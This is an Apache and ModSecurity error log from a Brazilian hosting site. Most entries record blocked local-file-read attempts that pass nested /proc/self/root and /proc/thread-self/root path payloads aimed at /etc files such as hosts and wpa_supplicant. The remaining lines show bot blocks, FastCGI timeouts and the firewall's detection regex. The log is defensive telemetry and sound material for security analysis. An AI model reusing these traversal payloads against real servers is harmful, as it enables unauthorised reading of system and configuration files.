[Wed Mar 18 02:33:08.230704 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:36394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5FPu8EFLIOrSqIpu-oAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:33:19.069892 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38394] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:33:40.132064 2026] [proxy_fcgi:error] [pid 19507:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38632] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:33:45.759624 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:35640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5OSmAPhZkrhU8w4klmwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:34:02.042083 2026] [proxy_fcgi:error] [pid 19507:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38846] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:34:05.246951 2026] [:error] [pid 17887:tid 140411691570944] [client 216.73.216.191:37586] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5TQkwaGbbGflqUZDKjwAAAMY"]
[Wed Mar 18 02:34:25.121813 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39096] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:34:35.284458 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:58402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5a9Y0UrI5A3LftIxGSgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:34:47.133977 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39340] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:35:09.133986 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39626] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:35:11.439109 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:58728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5j0zinOy1jxa1j4fI0QAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:35:33.133790 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40002] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:35:35.827810 2026] [:error] [pid 15826:tid 140411590858496] [client 216.73.216.191:39228] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5p-oXxyEfFpUF8f8kFQAAAVI"]
[Wed Mar 18 02:35:55.126426 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40234] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:35:59.803432 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:40762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5v_u8EFLIOrSqIpu-4AAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:36:11.458840 2026] [:error] [pid 15826:tid 140411674785536] [client 216.73.216.191:39572] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo5y-oXxyEfFpUF8f8kHAAAAUg"]
[Wed Mar 18 02:36:17.119465 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40486] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:36:19.475362 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.244.43:47946] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo50ymAPhZkrhU8w4klyAAAAII"]
[Wed Mar 18 02:36:26.717118 2026] [mime_magic:error] [pid 31803:tid 140411582465792] (70014)End of file found: [client 74.7.243.128:53458] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/include/bits
[Wed Mar 18 02:36:26.717275 2026] [access_compat:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:53458] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/include/bits
[Wed Mar 18 02:36:37.882195 2026] [core:alert] [pid 26799:tid 140411658000128] [client 74.7.243.128:49646] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/include/linux
[Wed Mar 18 02:36:39.126975 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40732] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:36:43.285370 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.228.61:47558] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo56ymAPhZkrhU8w4klzgAAAIk"]
[Wed Mar 18 02:37:00.133987 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41012] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:37:22.137795 2026] [proxy_fcgi:error] [pid 15051:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41312] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:37:44.128591 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41484] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:38:07.121796 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41734] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:38:29.841869 2026] [proxy_fcgi:error] [pid 29882:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42008] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:38:53.097921 2026] [proxy_fcgi:error] [pid 29882:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42304] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:39:00.583644 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:54192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo6dMdf6f5d65gmYZSH4wAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:39:15.121249 2026] [proxy_fcgi:error] [pid 29882:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42740] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:39:26.668376 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:54374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo6jvu8EFLIOrSqIpu_WAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:39:36.128726 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43462] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:39:50.023062 2026] [:error] [pid 11816:tid 140411725141760] [client 216.73.216.191:42486] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo6puw_le52K8_3pV2XawAAAgI"]
[Wed Mar 18 02:39:58.121784 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43674] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:40:19.121493 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43938] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:40:27.394040 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:59920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo6yymAPhZkrhU8w4kmFAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:40:42.133819 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44158] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:40:46.378264 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:59370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo63ta6ubjKNq_cu4ZNTwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:40:50.181314 2026] [mime_magic:error] [pid 17653:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:33742] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/log
[Wed Mar 18 02:41:04.161790 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44372] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:41:06.125466 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:57684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo68uw_le52K8_3pV2XhQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:41:27.130028 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44658] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:41:30.027345 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.244.43:46550] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo7CgkwaGbbGflqUZDLBQAAANM"]
[Wed Mar 18 02:41:34.057306 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:43886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo7Dvu8EFLIOrSqIpu_eAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:41:43.107337 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.228.61:51170] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo7F9Y0UrI5A3LftIxG4gAAAYg"]
[Wed Mar 18 02:41:49.125831 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44898] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:42:12.065874 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45170] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:42:35.149266 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45500] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:42:49.690564 2026] [mime_magic:error] [pid 19507:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:14495] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 02:42:49.690710 2026] [access_compat:error] [pid 19507:tid 140411674785536] [client 216.73.216.191:14495] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 02:42:57.037861 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45774] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:43:06.595904 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:58924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo7auyqAr6etmhZHNpvjAAAAFA"], referer: 